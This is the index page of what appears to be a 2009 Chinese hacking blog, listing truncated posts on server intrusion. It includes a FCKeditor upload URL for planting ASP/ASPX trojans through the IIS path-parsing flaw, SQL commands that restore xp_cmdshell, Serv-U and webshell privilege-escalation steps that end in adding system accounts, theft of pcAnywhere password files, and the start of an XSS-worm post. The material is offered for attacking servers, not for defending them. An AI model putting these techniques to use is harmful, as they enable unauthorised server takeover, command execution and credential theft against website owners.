14 三 09 fckeditor漏洞利用
安全
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
可以自定义文件夹名称上传图片木马,利用2003路径解析漏洞,也可以直接上传ASP木马。
如果是ASPX的就将/asp/connector.asp后缀改为ASPX
Type=Image这个变量是我们自己定义的。比如:
fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp
Tags: 黑客
12 三 09 webshell提权
作者:唐钰小宝 本文由p9′blog转自华夏论坛
原文地址:http://bbs.77169.com/read-htm-tid-239508-fpage-5.html
1.看命令行组件是否存在wscript.shell
2.看系统版本,权限大就直接在C盘看,cmd下,set命令看下就OK!windows的为03,WINNT的为2000 (全文…)
11 三 09 恢复执行xp_cmdshell
1 未能找到存储过程’master..xpcmdshell’.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕 (全文…)
11 三 09 NET版本Serv-U提权程序
<%@ Page Language=”VB” Debug=”true” %>
<%@ import Namespace=”System.Net.Sockets” %>
<script runat=”server”>
‘ (全文…)
09 三 09 入侵windows xp系统常用的七大招数
安全
第一招:屏幕保护
在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。
提示:部分设计不完善的屏幕保护程序没有屏蔽系统的 (全文…)
Tags: windows xp, 黑客
07 三 09 介绍几个同ip地址反查域名的网站
安全
p9’s blog to:www.p9.net.cn
排名第一的当然是http://www.myipneighbors.com/不过近期升级遇到了麻烦停止服务2个多月了,但是它的站长并没有放弃,正在努力寻求解决中.
排名第二的ip地址反查域名网站我给了国内的http://ip.wen.la/不为别的就因为它的信息全,同一IP在国 (全文…)
06 三 09 Ajax如何进行跨域操作
安全
author:4lert
form:[H.S.G] http://www.3hsg.net
今天spz发现了一个blog社区的极其严重的xss漏洞,于是我便萌发了写一个xss worm的想法。在写的过程中遇到了很多的问题,最大最大的问题就是ajax的跨域问题。因为你请求的页面和请求处理页面不在一个域里面,所以就会出现跨域的问题,JS报错提示为“没有权限”,这就是所谓的跨域问题! (全文…)
Tags: 黑客
06 三 09 serv-u7 php版提权工具使用方法
一,su7是提权有几种方式?
有两种形式去干掉su7。
1>,登陆管理员控制台的页面
==>获取OrganizationId,用于添加用户
==>获取全局用户的“下一个新用户ID”
==>添加用户
==>添加用户的权限 or 添加全局用户权限
==>用户登陆
==>执行系统命令添加系统账户。 (全文…)
06 三 09 许多高手提升权限技巧
当我们取得一个webshell时候,下一部要做的就是提升权限
个人总结如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 (全文…)
